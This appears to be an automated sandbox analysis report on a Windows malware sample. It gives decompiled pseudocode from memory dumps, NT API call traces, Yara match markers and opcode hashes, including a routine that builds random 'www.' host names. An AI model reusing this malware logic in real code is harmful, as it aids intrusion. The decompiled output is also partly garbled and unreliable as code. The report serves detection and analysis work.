                                                  • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                  • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 61%
                                                  			E00409B43(void* __eax, void* __edi, intOrPtr _a4, signed char _a8, signed int _a1783756877) {
                                                  				char* _v8;
                                                  				char _v12;
                                                  				intOrPtr _v16;
                                                  				char _v536;
                                                  				signed int _v1957628859;
                                                  				char _t19;
                                                  				void* _t22;
                                                  				intOrPtr _t24;
                                                  				signed char _t26;
                                                  				intOrPtr _t28;
                                                  				intOrPtr* _t29;
                                                  				WCHAR* _t34;
                                                  				WCHAR* _t37;
                                                  				void* _t40;
                                                  				void* _t41;
                                                  
                                                  				if(__eax != 0xd0) {
                                                  					L8:
                                                  					_v1957628859 = _v1957628859 | _t26;
                                                  					_t29 = _t28 + 1;
                                                  					_a1783756877 = _a1783756877 | _t26;
                                                  					 *_t29 =  *_t29 + _t26; // executed
                                                  					__eflags =  *_t29;
                                                  					LdrLoadDll(_t34); // executed
                                                  					_t19 = _v12;
                                                  					goto L9;
                                                  				} else {
                                                  					asm("ror dword [eax-0x4], cl");
                                                  					_push(_t34);
                                                  					_t34 = _t37;
                                                  					_t26 = _a8;
                                                  					_v8 =  &_v536;
                                                  					_t22 = E0041AF60( &_v12, 0x104, _t26);
                                                  					_t40 = _t37 - 0x214 + 0xc;
                                                  					if(_t22 != 0) {
                                                  						_t24 = E0041B380(__eflags, _v8);
                                                  						_t41 = _t40 + 4;
                                                  						__eflags = _t24;
                                                  						if(_t24 != 0) {
                                                  							_t26 =  &_v12;
                                                  							E0041B600(_t26, 0);
                                                  							_t41 = _t41 + 8;
                                                  						}
                                                  						_t19 = E00419710(_v8);
                                                  						_v16 = _t19;
                                                  						__eflags = _t19;
                                                  						if(_t19 == 0) {
                                                  							_t28 = _a4;
                                                  							goto L8;
                                                  						}
                                                  						L9:
                                                  						return _t19;
                                                  					} else {
                                                  						return _t22;
                                                  					}
                                                  				}
                                                  			}



















                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: cf23d729a162f742a8e542a34e292f8dc0cb694e795ac33ecf25a9c0e5e37b97
                                                  • Instruction ID: bd36785a63b5dc3618b1c6c9b11c643d3e4f328dc2672cff3bea5a4d5f7cacde
                                                  • Opcode Fuzzy Hash: cf23d729a162f742a8e542a34e292f8dc0cb694e795ac33ecf25a9c0e5e37b97
                                                  • Instruction Fuzzy Hash: 5BD0A72050E2887FDB25C65C681585DFF64EF91120B04C6EEC889AB2C3C2305A098782
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 80258d98bd947ca51538fa41305977987f3915d7e5b62cefa6cfc7037a825be6
                                                  • Instruction ID: d5bc6bcb50bb5772c930fdf6b442db1d0650c5cde8c41e6c6c63b9a57e37c390
                                                  • Opcode Fuzzy Hash: 80258d98bd947ca51538fa41305977987f3915d7e5b62cefa6cfc7037a825be6
                                                  • Instruction Fuzzy Hash: 49B09B729014C9C5E711D7B156087277A047BD0745F16C061D2024645A4778C491F6B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  C-Code - Quality: 87%
                                                  			E004162C4(void* __eax, void* __ebx, void* __ecx, void* __edx) {
                                                  				signed char _t125;
                                                  				char _t128;
                                                  				signed char _t135;
                                                  				void* _t138;
                                                  				signed int _t143;
                                                  				intOrPtr _t158;
                                                  				intOrPtr _t201;
                                                  				void* _t206;
                                                  				signed int _t207;
                                                  				void* _t260;
                                                  				signed int _t263;
                                                  				intOrPtr _t264;
                                                  				void* _t267;
                                                  				void* _t268;
                                                  				void* _t271;
                                                  				void* _t272;
                                                  				void* _t275;
                                                  
                                                  				asm("pushad");
                                                  				asm("sbb eax, 0x25c7a78f");
                                                  				asm("out 0x68, eax");
                                                  				asm("fild word [esi-0x12019e59]");
                                                  				asm("cmpsb");
                                                  				_t206 = __ecx - 1;
                                                  				_t125 = __eax - _t206;
                                                  				if( *((intOrPtr*)(_t206 + _t206)) <= _t267) {
                                                  					_t268 = _t267 + 1;
                                                  					__eflags = _t125 & 0x00000000;
                                                  					E0041A130();
                                                  					_t272 = _t271 + 0xc;
                                                  					 *((char*)(_t268 - 0x10)) = 0;
                                                  					 *((intOrPtr*)(_t268 - 0xf)) = 0;
                                                  					 *((short*)(_t268 - 0xb)) = 0;
                                                  					 *((char*)(_t268 - 9)) = 0;
                                                  					_t263 = 0;
                                                  					__eflags = 0;
                                                  					do {
                                                  						_t128 = E004092B0(0x53, 0x92);
                                                  						_t272 = _t272 + 8;
                                                  						_t207 = 0;
                                                  						__eflags = 0;
                                                  						while(1) {
                                                  							__eflags = _t128 -  *((intOrPtr*)(_t268 + _t207 - 0x10));
                                                  							if(_t128 ==  *((intOrPtr*)(_t268 + _t207 - 0x10))) {
                                                  								goto L8;
                                                  							}
                                                  							_t207 = _t207 + 1;
                                                  							__eflags = _t207 - _t263;
                                                  							if(_t207 <= _t263) {
                                                  								continue;
                                                  							} else {
                                                  								__eflags = _t128;
                                                  								if(_t128 != 0) {
                                                  									 *((char*)(_t268 + _t263 - 0x10)) = _t128;
                                                  									_t263 = _t263 + 1;
                                                  									__eflags = _t263;
                                                  								}
                                                  							}
                                                  							goto L8;
                                                  						}
                                                  						L8:
                                                  						__eflags = _t263 - 8;
                                                  					} while (_t263 < 8);
                                                  					 *((intOrPtr*)(_t268 - 8)) = 0x2e777777;
                                                  					 *((char*)(_t268 - 4)) = 0;
                                                  					 *((short*)(_t268 - 3)) = 0;
                                                  					 *((char*)(_t268 - 1)) = 0;
                                                  					 *((char*)(_t268 - 0x98)) = 0;
                                                  					E0041A130(_t268 - 0x97, 0, 0x3f);
                                                  					E0041AA20(_t268 - 0x98, E004092B0(2, 5) & 0x000000ff);
                                                  					 *((char*)(_t268 + E0041A380(_t268 - 0x98) - 0x98)) = 0x3d;
                                                  					_t135 = E004092B0(4, 0x10);
                                                  					_t138 = E0041AA20(_t268 + E0041A380(_t268 - 0x98) - 0x98, _t135 & 0x000000ff);
                                                  					_t25 = _t268 + 8; // 0x2e777777
                                                  					_t264 =  *_t25;
                                                  					_t201 = 0;
                                                  					_t275 = _t272 + 0x34;
                                                  					 *((intOrPtr*)(_t268 - 0x14)) = 0;
                                                  					_t260 = 0;
                                                  					do {
                                                  						__eflags =  *((intOrPtr*)(_t264 + 0x1170)) - _t201;
                                                  						if( *((intOrPtr*)(_t264 + 0x1170)) != _t201) {
                                                  							E0041A0E0(_t268 - 0x58, 0x2e);
                                                  							 *((short*)(_t268 - 0x308)) = 0;
                                                  							E0041A130(_t268 - 0x306, 0, 0x206);
                                                  							E0041A0E0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260, 0x388);
                                                  							_t143 = E0041A6A0();
                                                  							_t33 = _t201 - 1; // -1
                                                  							 *( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x40) = _t143 * _t33 & 0x00000001;
                                                  							E0041A0B0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x87, _t268 - 0x98, E0041A380(_t268 - 0x98));
                                                  							_t41 = _t268 - 8; // 0x2e777777
                                                  							E0041A0B0(_t268 - 0x58, _t41, 4);
                                                  							_push(4);
                                                  							E00409E10(_t201, _t264, __eflags, _t264, _t268 + E0041A380(_t268 - 0x58) - 0x58,  *(_t268 + _t201 - 0x10) & 0x000000ff);
                                                  							E0041A0B0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260, _t268 - 0x58, E0041A380(_t268 - 0x58));
                                                  							_t158 = E0041A380(_t268 - 0x58);
                                                  							_t203 = _t264 + 0xe90;
                                                  							 *((intOrPtr*)(_t268 - 0x18)) = _t158;
                                                  							E0041A4B0(_t268 - 0x58, _t264 + 0xe90, 0);
                                                  							E00408C50(_t268 - 0x100);
                                                  							E004099D0(_t268 - 0x100, _t268 - 0x58, E0041A380(_t268 - 0x58));
                                                  							E004099A0(_t268 - 0x100);
                                                  							E0041A0B0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x72, _t268 - 0x100, 0x14);
                                                  							 *((char*)(_t268 +  *((intOrPtr*)(_t268 - 0x18)) - 0x58)) = 0;
                                                  							 *((intOrPtr*)( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x4c)) = 2;
                                                  							 *((intOrPtr*)( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x50)) = 1;
                                                  							E00409EA0(_t264 + 0xe90, _t264, __eflags, _t264, _t268 - 0x308, 0x46, 1);
                                                  							E0041A750( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0xc7, _t268 - 0x308);
                                                  							E00409EA0(_t264 + 0xe90, _t264, __eflags, _t264, _t268 - 0x308, 0x47, 1);
                                                  							E0041A750(E0041A380( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0xc7) +  *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0xc7, _t268 - 0x308);
                                                  							E0041A4B0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0xc7, _t268 - 0x58, 0);
                                                  							E00409EA0(_t203, _t264, __eflags, _t264, _t268 - 0x308, 0x4a, 1);
                                                  							E0041A750( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x167, _t268 - 0x308);
                                                  							E00409EA0(_t203, _t264, __eflags, _t264, _t268 - 0x308, 0x4b, 1);
                                                  							E0041A750(E0041A380( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x167) +  *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x167, _t268 - 0x308);
                                                  							E0041A4B0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x167, _t268 - 0x58, 0);
                                                  							E00409EA0(_t203, _t264, __eflags, _t264, _t268 - 0x308, 0x4f, 1);
                                                  							__eflags = E0041A380( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x287) +  *((intOrPtr*)(_t264 + 0x14a4));
                                                  							E0041A750(E0041A380( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x287) +  *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x287, _t268 - 0x308);
                                                  							E0041A4B0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x287, _t268 - 0x58, 0);
                                                  							_t138 = E0041A4B0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x287, _t203, 0);
                                                  							_t201 =  *((intOrPtr*)(_t268 - 0x14));
                                                  							_t275 = _t275 + 0x144;
                                                  						}
                                                  						_t201 = _t201 + 1;
                                                  						_t260 = _t260 + 0x388;
                                                  						 *((intOrPtr*)(_t268 - 0x14)) = _t201;
                                                  						__eflags = _t260 - 0x1c40;
                                                  					} while (_t260 < 0x1c40);
                                                  					return _t138;
                                                  				} else {
                                                  					return _t125 - 1;
                                                  				}
                                                  			}





















                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: =$www.$www.
                                                  • API String ID: 0-3343787489
                                                  • Opcode ID: 73814bf4e719de51a9cfaff285d9e4ffe9f105650208ebdc455f383059ee60ac
                                                  • Instruction ID: 9c247b9d6cf6bf096c2a9d86ec6e1778e41a3057b207ffac2e27cf033451d30a
                                                  • Opcode Fuzzy Hash: 73814bf4e719de51a9cfaff285d9e4ffe9f105650208ebdc455f383059ee60ac
                                                  • Instruction Fuzzy Hash: 66B1D671951204ABCB14DBB0CC82FDFB37CAF44318F44455EF6595B183DA78A688CBAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 53%
                                                  			E00A4FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                  				void* _t7;
                                                  				intOrPtr _t9;
                                                  				intOrPtr _t10;
                                                  				intOrPtr* _t12;
                                                  				intOrPtr* _t13;
                                                  				intOrPtr _t14;
                                                  				intOrPtr* _t15;
                                                  
                                                  				_t13 = __edx;
                                                  				_push(_a4);
                                                  				_t14 =  *[fs:0x18];
                                                  				_t15 = _t12;
                                                  				_t7 = E009FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                  				_push(_t13);
                                                  				E00A45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                  				_t9 =  *_t15;
                                                  				if(_t9 == 0xffffffff) {
                                                  					_t10 = 0;
                                                  				} else {
                                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                  				}
                                                  				_push(_t10);
                                                  				_push(_t15);
                                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                  				return E00A45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                  			}











                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A4FDFA
                                                  Strings
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A4FE01
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A4FE2B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: 047f2975765252d463194e3f9cdeb6d97c3b0215f0d9471ecc640299cacd0846
                                                  • Instruction ID: aa175ee76ad20d93205dadc1b6fbb9a5af9205be2f7b8caa8c20ed51bef38ee4
                                                  • Opcode Fuzzy Hash: 047f2975765252d463194e3f9cdeb6d97c3b0215f0d9471ecc640299cacd0846
                                                  • Instruction Fuzzy Hash: A1F0F676640601BFDA201B55DD03F23BB6AEBC5730F244324F628565E2DA62FC2097F0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02973BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02973BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0297861D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: 5682aaaf0bddb73e1b1c9d2514eefb1d9d1d0cb34aa7f3540d995826817f1ad3
                                                  • Instruction ID: 41fa51a2c93ed11ca4e793e6923b892c1f3130889e4da12799b7af331cc9fa39
                                                  • Opcode Fuzzy Hash: 5682aaaf0bddb73e1b1c9d2514eefb1d9d1d0cb34aa7f3540d995826817f1ad3
                                                  • Instruction Fuzzy Hash: 2901AFB2241108AFCB48CF98DC95EEB77A9FF8C354F158248BA0DD7251C630E811CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02973BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02973BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0297861D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                  • Instruction ID: 05cf793b55321ef79d7ed13495decd4251f4dafcef54341242ef0d796ad6a8f5
                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                  • Instruction Fuzzy Hash: E7F0BDB2200208AFCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtReadFile.NTDLL(02973D82,5E972F65,FFFFFFFF,02973A41,?,?,02973D82,?,02973A41,FFFFFFFF,5E972F65,02973D82,?,00000000), ref: 029786C5
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: ab47185789dcdba063c4b682eedd820d6376843b24f41e02eb591ec166db7b76
                                                  • Instruction ID: 38c9ed59e276d343599a600b59d24c3ceac7f3fa00c7a42cfd2cf5ac95bb2121
                                                  • Opcode Fuzzy Hash: ab47185789dcdba063c4b682eedd820d6376843b24f41e02eb591ec166db7b76
                                                  • Instruction Fuzzy Hash: 3EF0A4B2200108AFDB18DF89DC84EEB77A9EF8C754F158248BE1D97241D630E911CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtReadFile.NTDLL(02973D82,5E972F65,FFFFFFFF,02973A41,?,?,02973D82,?,02973A41,FFFFFFFF,5E972F65,02973D82,?,00000000), ref: 029786C5
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                  • Instruction ID: 6bd62b9e3a0cf681f04966fe0d0d28b34dc17324aa8d89eb3d17da974d03efe0
                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                  • Instruction Fuzzy Hash: 96F0A4B2200208AFDB18DF89DC84EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02962D11,00002000,00003000,00000004), ref: 029787E9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: f59398515f8775d4932f0878bc3a50ad9d46d7f4c844e3c8cef73cf98d19877b
                                                  • Instruction ID: 83329df9fa84937da913f80fcef0f86c4d8a2655b4f306c988a1b8d3357d7aa0
                                                  • Opcode Fuzzy Hash: f59398515f8775d4932f0878bc3a50ad9d46d7f4c844e3c8cef73cf98d19877b
                                                  • Instruction Fuzzy Hash: 1AF01CB6200208AFDB14DFA9CC84EEB77A9EF98750F158259FE0997241D630E911CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02962D11,00002000,00003000,00000004), ref: 029787E9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                  • Instruction ID: 720950d8375739d9e02398f812bd6390a3c4a7edc35097629e2e93fa0039c0c7
                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                  • Instruction Fuzzy Hash: B4F015B2200208AFDB18DF89CC80EAB77ADEF88750F118148BE0897241C630F810CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtClose.NTDLL(02973D60,?,?,02973D60,00000000,FFFFFFFF), ref: 02978725
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: dd024dab1d37b046812b83b44ebdbed4c211e01943ff0e26663237506ce41b42
                                                  • Instruction ID: ea5be7c9f2498519c794f2b1f9a8705bf8ebef1d2786c9b9c0f829af3df68824
                                                  • Opcode Fuzzy Hash: dd024dab1d37b046812b83b44ebdbed4c211e01943ff0e26663237506ce41b42
                                                  • Instruction Fuzzy Hash: 59E086352051147FE710DBB4CC48EDB7F68EF45260F144699B9599B682C130A500C790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtClose.NTDLL(02973D60,?,?,02973D60,00000000,FFFFFFFF), ref: 02978725
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                  • Instruction ID: d3c2ede6c4ba992c23baa7fdf11012012ed370a213499383cf6e97c1c44184cf
                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                  • Instruction Fuzzy Hash: CED012752002146BD714EB98CC45E97776DEF44750F154455BA185B241C570F51086E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 65f188fa55456e9367fcdf89be44f316b7482366b747d5d534c922a7cf2e9a0a
                                                  • Instruction ID: 26c1eabf6b9e0e47bf62a9dd6559060cd93fea0ccd8bdadc9b6c722e45d4c73a
                                                  • Opcode Fuzzy Hash: 65f188fa55456e9367fcdf89be44f316b7482366b747d5d534c922a7cf2e9a0a
                                                  • Instruction Fuzzy Hash: B79002B120100453F51165594605717004D97D0285F91C422A0415558DA6D6DD52B171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: fe0e0d4f25eb64db682ee9722719f7174310a3c10abe474c9994a1c87ebac751
                                                  • Instruction ID: ba73f3dec77c3b9d888ff2b66cc2ec2c3fba8d63620f645c74d3d63355cbde10
                                                  • Opcode Fuzzy Hash: fe0e0d4f25eb64db682ee9722719f7174310a3c10abe474c9994a1c87ebac751
                                                  • Instruction Fuzzy Hash: 489002A1242041927945B5594505517404EA7E0285791C022A1405950C95A6EC56E671
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f8535325eab462cebbe7bacc0057da9c8c3e6a8817a29e58040543fc458df28d
                                                  • Instruction ID: 1233646fcf6475a779d468cb3c0440eb9637f1bded6735864c4ebdb12943fdf9
                                                  • Opcode Fuzzy Hash: f8535325eab462cebbe7bacc0057da9c8c3e6a8817a29e58040543fc458df28d
                                                  • Instruction Fuzzy Hash: 889002A5211000432505A9590705517008E97D5395351C031F1006550CE6A1DC616171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3b1db7854d936958adb52e1ff8b4bbafae8dcf9cb997fe6f4fef7925b97b8b75
                                                  • Instruction ID: 5a1b989d383c95f204926781e51c7d6bb317b437e1f03f3bf61d03e1787b6ec1
                                                  • Opcode Fuzzy Hash: 3b1db7854d936958adb52e1ff8b4bbafae8dcf9cb997fe6f4fef7925b97b8b75
                                                  • Instruction Fuzzy Hash: B99002F120100442F54075594505756004D97D0345F51C021A5055554E96D9DDD576B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1990ad5e70501e3f5814781efd88ba355878d35b75168613c556d0cca34b2d1f
                                                  • Instruction ID: c7fc412560947be56030bb6624cfc94aa254294cdca59688f576ca302196cbe4
                                                  • Opcode Fuzzy Hash: 1990ad5e70501e3f5814781efd88ba355878d35b75168613c556d0cca34b2d1f
                                                  • Instruction Fuzzy Hash: 3B9002E120200043650575594515626404E97E0245B51C031E1005590DD5A5DC917175
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4a48261b4957998a333b2b28555a8b757b7c628ca90c6967dff1013e660b8f68
                                                  • Instruction ID: f70809a16e8b0cea12a8f5ad041c9517fcedef886100498a741a9c0c000d3c14
                                                  • Opcode Fuzzy Hash: 4a48261b4957998a333b2b28555a8b757b7c628ca90c6967dff1013e660b8f68
                                                  • Instruction Fuzzy Hash: E29002E134100482F50065594515B16004DD7E1345F51C025E1055554D9699DC527176
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1515c5741c3351c7d79751d8c245a9d2f4d5f1c2a61bd12452fc9eb9adc89ffc
                                                  • Instruction ID: 1ba0a98f65fe2ae7e596ab31d90ae13c49472793141604adb8dcf84f7e85451b
                                                  • Opcode Fuzzy Hash: 1515c5741c3351c7d79751d8c245a9d2f4d5f1c2a61bd12452fc9eb9adc89ffc
                                                  • Instruction Fuzzy Hash: 989002B120100842F5807559450565A004D97D1345F91C025A0016654DDA95DE5977F1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
